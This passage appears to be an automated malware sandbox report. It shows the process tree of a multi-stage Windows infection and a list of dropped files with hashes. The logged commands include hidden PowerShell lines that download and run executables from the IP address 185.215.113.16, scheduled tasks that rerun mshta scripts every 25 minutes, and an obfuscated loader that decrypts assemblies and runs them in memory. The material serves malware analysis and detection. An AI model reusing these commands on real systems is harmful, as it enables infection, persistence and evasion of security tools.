                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 10
                                        6⤵
                                        • Delays execution with timeout.exe
                                        PID:4176
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 968
                                    4⤵
                                    • Program crash
                                    PID:3868
                                • C:\Users\Admin\AppData\Local\Temp\1085329001\amnew.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1085329001\amnew.exe"
                                  3⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of FindShellTrayWindow
                                  PID:928
                                  • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                    "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                    4⤵
                                    • Downloads MZ/PE file
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:1320
                                    • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                      5⤵
                                        PID:3192
                                        • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                          6⤵
                                            PID:5132
                                        • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                          5⤵
                                            PID:5516
                                            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                              6⤵
                                                PID:4844
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 832
                                                6⤵
                                                • Program crash
                                                PID:6072
                                            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                              5⤵
                                                PID:1916
                                                • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                  6⤵
                                                    PID:1648
                                                  • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                    6⤵
                                                      PID:5568
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 976
                                                      6⤵
                                                      • Program crash
                                                      PID:1740
                                                  • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
                                                    5⤵
                                                      PID:5304
                                                    • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                      5⤵
                                                        PID:5912
                                                        • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                          6⤵
                                                            PID:5784
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 968
                                                            6⤵
                                                            • Program crash
                                                            PID:3404
                                                    • C:\Users\Admin\AppData\Local\Temp\1085378101\8f14b42b36.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1085378101\8f14b42b36.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:940
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c schtasks /create /tn vzafQmacloC /tr "mshta C:\Users\Admin\AppData\Local\Temp\n0EQL7zAg.hta" /sc minute /mo 25 /ru "Admin" /f
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3560
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn vzafQmacloC /tr "mshta C:\Users\Admin\AppData\Local\Temp\n0EQL7zAg.hta" /sc minute /mo 25 /ru "Admin" /f
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4468
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        mshta C:\Users\Admin\AppData\Local\Temp\n0EQL7zAg.hta
                                                        4⤵
                                                        • Checks computer location settings
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4056
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9A2ZJG3EZ1CX8DBIN0UCJ1FF8ZCEU2EH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Downloads MZ/PE file
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2752
                                                          • C:\Users\Admin\AppData\Local\Temp9A2ZJG3EZ1CX8DBIN0UCJ1FF8ZCEU2EH.EXE
                                                            "C:\Users\Admin\AppData\Local\Temp9A2ZJG3EZ1CX8DBIN0UCJ1FF8ZCEU2EH.EXE"
                                                            6⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5392
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" "
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4056
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085379021\am_no.cmd" any_word
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5156
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 2
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Delays execution with timeout.exe
                                                          PID:5200
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5640
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                            6⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5656
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5808
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                            6⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5824
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6028
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                            6⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:6068
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn "2avy5mabJlQ" /tr "mshta \"C:\Temp\wnYQlebXI.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                          5⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:4940
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          mshta "C:\Temp\wnYQlebXI.hta"
                                                          5⤵
                                                            PID:4144
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:5720
                                                              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                7⤵
                                                                  PID:1604
                                                        • C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6040
                                                          • C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1085382001\7aencsM.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:5208
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 968
                                                            4⤵
                                                            • Program crash
                                                            PID:5276
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1085385041\tYliuwV.ps1"
                                                          3⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:1600
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                                            4⤵
                                                              PID:3964
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                                                5⤵
                                                                  PID:3464
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  5⤵
                                                                    PID:2912
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                      6⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:5772
                                                              • C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"
                                                                3⤵
                                                                  PID:2356
                                                                  • C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"
                                                                    4⤵
                                                                      PID:628
                                                                    • C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"
                                                                      4⤵
                                                                        PID:5280
                                                                      • C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\1085386001\Ta3ZyUR.exe"
                                                                        4⤵
                                                                          PID:4248
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 984
                                                                          4⤵
                                                                          • Program crash
                                                                          PID:5676
                                                                      • C:\Users\Admin\AppData\Local\Temp\1085387001\DTQCxXZ.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\1085387001\DTQCxXZ.exe"
                                                                        3⤵
                                                                          PID:4460
                                                                        • C:\Users\Admin\AppData\Local\Temp\1085388001\d2YQIJa.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1085388001\d2YQIJa.exe"
                                                                          3⤵
                                                                            PID:5528
                                                                          • C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"
                                                                            3⤵
                                                                              PID:5472
                                                                              • C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"
                                                                                4⤵
                                                                                  PID:4888
                                                                                • C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"
                                                                                  4⤵
                                                                                    PID:5888
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1085389001\Bjkm5hE.exe"
                                                                                    4⤵
                                                                                      PID:5896
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 984
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:1316
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1085390001\qFqSpAp.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1085390001\qFqSpAp.exe"
                                                                                    3⤵
                                                                                      PID:4384
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe"
                                                                                      3⤵
                                                                                        PID:5572
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1085391001\jROrnzx.exe"
                                                                                          4⤵
                                                                                            PID:3508
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 968
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:2980
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1085392001\3ef7630227.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1085392001\3ef7630227.exe"
                                                                                          3⤵
                                                                                            PID:1900
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1085393001\9ae9d59fed.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1085393001\9ae9d59fed.exe"
                                                                                            3⤵
                                                                                              PID:5856
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2872 -ip 2872
                                                                                          1⤵
                                                                                            PID:1472
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1668 -ip 1668
                                                                                            1⤵
                                                                                              PID:5008
                                                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                              1⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Checks BIOS information in registry
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:3508
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4248 -ip 4248
                                                                                              1⤵
                                                                                                PID:2612
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2604 -ip 2604
                                                                                                1⤵
                                                                                                  PID:4248
                                                                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                  1⤵
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:2284
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3196 -ip 3196
                                                                                                  1⤵
                                                                                                    PID:728
                                                                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                    1⤵
                                                                                                      PID:1504
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                      1⤵
                                                                                                        PID:3108
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6040 -ip 6040
                                                                                                        1⤵
                                                                                                          PID:5256
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2356 -ip 2356
                                                                                                          1⤵
                                                                                                            PID:4888
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5516 -ip 5516
                                                                                                            1⤵
                                                                                                              PID:5228
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5472 -ip 5472
                                                                                                              1⤵
                                                                                                                PID:6140
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1916 -ip 1916
                                                                                                                1⤵
                                                                                                                  PID:5384
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5572 -ip 5572
                                                                                                                  1⤵
                                                                                                                    PID:5164
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5912 -ip 5912
                                                                                                                    1⤵
                                                                                                                      PID:1956

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin:.repos

                                                                                                                      Filesize

                                                                                                                      1.2MB

                                                                                                                      MD5

                                                                                                                      7f2ace6547a9af30983a98447e9e1f07

                                                                                                                      SHA1

                                                                                                                      ea8de37ffc05d74f0cae823c4f1bc7abe2c3c021

                                                                                                                      SHA256

                                                                                                                      7ce01f9bd56fce91c9560afad57f4facdfe729607b067c4906e679a957dedefa

                                                                                                                      SHA512

                                                                                                                      6c74ff2468c7dc963e442d93e4730afe796de85b44858e1f0b1dfe928c048368d54b5e9cb10890c8ca8c0dfe73385c439da4e402ae8f8bde887094a4fd850884

                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                      Filesize

                                                                                                                      2B

                                                                                                                      MD5

                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                      SHA1

                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                      SHA256

                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                      SHA512

                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                      Filesize

                                                                                                                      152B

                                                                                                                      MD5

                                                                                                                      0621e31d12b6e16ab28de3e74462a4ce

                                                                                                                      SHA1

                                                                                                                      0af6f056aff6edbbc961676656d8045cbe1be12b

                                                                                                                      SHA256

                                                                                                                      1fd3365fdb49f26471ce9e348ce54c9bc7b66230118302b32074029d88fb6030

                                                                                                                      SHA512

                                                                                                                      bf0aa5b97023e19013d01abd3387d074cdd5b57f98ec4b0241058b39f9255a7bbab296dce8617f3368601a3d751a6a66dc207d8dd3fc1cba9cac5f98e3127f6f

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                      Filesize

                                                                                                                      152B

                                                                                                                      MD5

                                                                                                                      56361f50f0ee63ef0ea7c91d0c8b847a

                                                                                                                      SHA1

                                                                                                                      35227c31259df7a652efb6486b2251c4ee4b43fc

                                                                                                                      SHA256

                                                                                                                      7660beecfee70d695225795558f521c3fb2b01571c224b373d202760b02055c0

                                                                                                                      SHA512

                                                                                                                      94582035220d2a78dfea9dd3377bec3f4a1a1c82255b3b74f4e313f56eb2f7b089e36af9fceea9aa83b7c81432622c3c7f900008a1bdb6b1cd12c4073ae4b8a2

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                      Filesize

                                                                                                                      6KB

                                                                                                                      MD5

                                                                                                                      1fc571111989f405991af3b3fd67dcb7

                                                                                                                      SHA1

                                                                                                                      e0c8073b7745a08f9a8290a5ab59fb5f097ec587

                                                                                                                      SHA256

                                                                                                                      27ef6c6fd7bce8e22383af6dddad5fc04b63ea5320ed670efb7bd2abe1cb51e2

                                                                                                                      SHA512

                                                                                                                      7958b19078ded5cae42aaa61d9918fc564a249d4a7b9e9ada5c0f190ad5d5c4d0ef400a3841ad23593072e4f9c00b9f4d8b52eb3a31884c78d591b9206dea6af

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp9A2ZJG3EZ1CX8DBIN0UCJ1FF8ZCEU2EH.EXE

                                                                                                                      Filesize

                                                                                                                      1.7MB

                                                                                                                      MD5

                                                                                                                      01c87832191e4ec3561802276e00a9da

                                                                                                                      SHA1

                                                                                                                      5d30e7bc1c0ca52ab683283ca93582f0e114f531

                                                                                                                      SHA256

                                                                                                                      4c94e2b0301320774d531b2f10755adf18dd3c785d9b62c01a9edba42e869243

                                                                                                                      SHA512

                                                                                                                      f8e2fb1a2696ad50a0a3cb2b22f576b75a2663304520ba0c91940f540b842d40776a3a73f657202dd74d191fed0bcf877e854852c9df7ac6ed6cb3a1aa465754

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

                                                                                                                      Filesize

                                                                                                                      19.4MB

                                                                                                                      MD5

                                                                                                                      f70d82388840543cad588967897e5802

                                                                                                                      SHA1

                                                                                                                      cd21b0b36071397032a181d770acd811fd593e6e

                                                                                                                      SHA256

                                                                                                                      1be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35

                                                                                                                      SHA512

                                                                                                                      3d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe

                                                                                                                      Filesize

                                                                                                                      350KB

                                                                                                                      MD5

                                                                                                                      a8ead31687926172939f6c1f40b6cc31

                                                                                                                      SHA1

                                                                                                                      2f91f75dbdef8820146ceb6470634ab1ffb7b156

                                                                                                                      SHA256

                                                                                                                      84aad76d2d1ac2179ea160565a28fc850ee125ff74c3aeb1754d20d8c9ed870c

                                                                                                                      SHA512

                                                                                                                      a0082f833c6858208f04a62b03088873baac303203f758e458a1a067572ffe9785edb30dd075acbfc1431272f56a1b1be168ef29f6db0a7ee55578dc712fa387

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe

                                                                                                                      Filesize

                                                                                                                      348KB

                                                                                                                      MD5

                                                                                                                      ce869420036665a228c86599361f0423

                                                                                                                      SHA1

                                                                                                                      8732dfe486f5a7daa4aedda48a3eb134bc2f35c0

                                                                                                                      SHA256

                                                                                                                      eb04f77eb4f92dd2b46d04408166a32505e5016435ccd84476f20eeba542dafd

                                                                                                                      SHA512

                                                                                                                      66f47f62ce2c0b49c6effcd152e49360b5fa4667f0db74bff7ff723f6e4bfc4df305ae249fad06feeaad57df14ee9919b7dcc04f7a55bb4b07e96406ed14319e

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1014060001\8371616b8a.exe

                                                                                                                      Filesize

                                                                                                                      345KB

                                                                                                                      MD5

                                                                                                                      3bc7df7bd28d062f0764332023340d2b

                                                                                                                      SHA1

                                                                                                                      a602f64795debb0222a704e8f851775dcf21cde3

                                                                                                                      SHA256

                                                                                                                      713e92e6b5f368bb1208f55f80a3353f8ffa25a97f914fad517032bf923782c9

                                                                                                                      SHA512

                                                                                                                      7039567543de586d26411b701387178f2129529a18537b1b4c292b4e93e783db37a551e3cebf77e0f6a67ebb10fddf5f62ba83093ec5e2985736e6acacde9bad

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe

                                                                                                                      Filesize

                                                                                                                      9.8MB

                                                                                                                      MD5

                                                                                                                      db3632ef37d9e27dfa2fd76f320540ca

                                                                                                                      SHA1

                                                                                                                      f894b26a6910e1eb53b1891c651754a2b28ddd86

                                                                                                                      SHA256

                                                                                                                      0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d

